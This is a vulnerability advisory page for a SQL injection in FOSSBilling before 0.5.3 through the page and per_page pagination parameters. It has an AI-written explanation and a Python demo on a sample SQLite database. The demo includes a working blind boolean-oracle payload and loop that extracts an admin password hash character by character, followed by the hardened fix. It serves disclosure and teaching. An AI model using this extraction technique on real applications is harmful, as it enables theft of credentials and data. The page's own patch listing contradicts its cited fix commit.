SQL Injection in fossbilling/fossbilling
Description
SQL Injection in GitHub repository fossbilling/fossbilling prior to 0.5.3.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in FOSSBilling before 0.5.3 via the unsanitized page and per_page request parameters, which are interpolated into a SQL LIMIT clause, allowing unauthorized database access.
Vulnerability
A SQL injection vulnerability exists in the getSimpleResultSet and getAdvancedResultSet methods of FOSSBilling prior to version 0.5.3. The page and per_page GET parameters were interpolated into the SQL LIMIT clause through sprintf with a %s format specifier and no validation; %s passes the string through verbatim, so any non-numeric content in either parameter becomes part of the executed query. Affected versions: all before 0.5.3 [1].
Exploitation
According to the cited reference, the pagination endpoints are reachable without authentication and no user interaction is needed [2]. An attacker supplies crafted values in the page or per_page parameter (the reference illustrates this with ?page=1 UNION...), and those values are placed into the LIMIT clause of the query. Because the injection point sits at the tail of a SELECT, what a payload can do depends on the DBMS and driver in use: MySQL, for instance, rejects a bare UNION directly after LIMIT (error 1221, "Incorrect usage of UNION and LIMIT"), so the reference's example should be read as an illustration of the injection point rather than as a working payload. In practice a LIMIT injection point is most often exploited blind, by making the row count or the response time depend on an attacker-chosen condition.
Impact
Successful exploitation lets the attacker read, modify, or delete database content, potentially leading to full data compromise. Depending on the privileges granted to the application's database account, this could escalate to remote code execution [2]; what is reachable is bounded by those grants, so running the application with a least-privileged database user limits the blast radius even where the injection itself is not fixed.
Mitigation
The issue is fixed in commit 2ddb7438ee0d05f9a9d01555edcfed820960f114 [1] and shipped in FOSSBilling 0.5.3. The fix checks that page and per_page are numeric and formats them with %u rather than %s, so sprintf emits an unsigned integer and anything that is not a digit sequence can no longer reach the query. Users must upgrade to 0.5.3 or later; no workaround exists [1][2]. Note that %u is a sound defence here only because LIMIT takes integers; for string-valued parameters the equivalent fix is a bound parameter, not a format specifier.
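The mechanism and the 0.5.3 fix, as an added example that is not code from FOSSBilling or its advisory. It uses an in-memory SQLite database as a constructed stand-in (FOSSBilling runs on MySQL, whose LIMIT grammar is stricter, so the exact payload that works differs per DBMS), builds the LIMIT clause the vulnerable way and the hardened way, and shows why a %s-style LIMIT is exploitable even where UNION is not: a scalar subquery in LIMIT position turns the number of rows returned into a boolean oracle that leaks one character per query. The table names, the page-as-offset simplification in the vulnerable function, and the bound-parameter form of the fix are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed sample database (not from the project). SQLite stands in for the
# application's MySQL database so the example runs offline; the
# build-then-execute pattern and the fix are the same on either DBMS.
def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE invoice (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT, pass_hash TEXT);
        INSERT INTO invoice (title) VALUES ('Inv 1'), ('Inv 2'), ('Inv 3'), ('Inv 4'), ('Inv 5');
        INSERT INTO admin (email, pass_hash) VALUES ('root@example.test', 'a1b2c3');
        """
    )
    return conn


def vulnerable_result_set(conn, page: str, per_page: str) -> list:
    """Assumed pre-0.5.3 shape: raw request strings are formatted into the
    LIMIT clause with %s, so whatever they contain becomes part of the query.
    page is used directly as the row offset to keep the example short
    (the real code derives an offset from the page number)."""
    sql = "SELECT id, title FROM invoice ORDER BY id LIMIT %s, %s" % (page, per_page)
    return conn.execute(sql).fetchall()


# Attacker-controlled per_page value: a scalar subquery in LIMIT position that
# yields 5 rows when the guess about the admin hash is right and 0 otherwise.
# The row count is the oracle; the subquery's own output is never displayed.
def oracle_payload(position: int, guess: str) -> str:
    return (
        "(SELECT CASE WHEN substr(pass_hash, %d, 1) = '%s' THEN 5 ELSE 0 END FROM admin)"
        % (position, guess)
    )


def recover_hash_prefix(conn, length: int, alphabet: str = "0123456789abcdef") -> str:
    """Blind extraction through the vulnerable pagination: one request per guess."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            rows = vulnerable_result_set(conn, "0", oracle_payload(pos, ch))
            if len(rows) == 5:
                recovered += ch
                break
        else:
            break  # no candidate matched; stop rather than guess
    return recovered


# Hardened form, mirroring the 0.5.3 fix: accept only digit strings, convert
# to non-negative integers (the PHP fix does this with a numeric check plus
# %u), clamp to sane bounds, and bind the integers instead of formatting them.
_DIGITS = re.compile(r"[0-9]{1,9}")


def _as_uint(value: str, default: int) -> int:
    if value is None or value == "":
        return default
    if not _DIGITS.fullmatch(value):
        raise ValueError("pagination parameter must be an unsigned integer")
    return int(value)


def safe_result_set(conn, page: str, per_page: str, max_per_page: int = 100) -> list:
    page_n = max(_as_uint(page, 1), 1)                      # 1-based page number
    per_page_n = min(max(_as_uint(per_page, 10), 1), max_per_page)
    offset = (page_n - 1) * per_page_n
    sql = "SELECT id, title FROM invoice ORDER BY id LIMIT ? OFFSET ?"
    return conn.execute(sql, (per_page_n, offset)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("benign:", vulnerable_result_set(db, "2", "2"))
    print("leaked hash prefix:", recover_hash_prefix(db, 3))
    print("hardened:", safe_result_set(db, "2", "2"))
    try:
        safe_result_set(db, "0", oracle_payload(1, "a"))
    except ValueError as exc:
        print("rejected:", exc)
```

The oracle needs no error messages and no visible output from the injected subquery: it only counts rows in an otherwise normal page of results, which is why a LIMIT-position injection is still serious on a DBMS that refuses UNION there. The clamp on per_page in the hardened version is a separate, cheap defence against using a legitimate pagination endpoint to dump an entire table in one request.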
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <0.5.3
- fossbilling/fossbilling/fossbillingv5, Range: unspecified
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.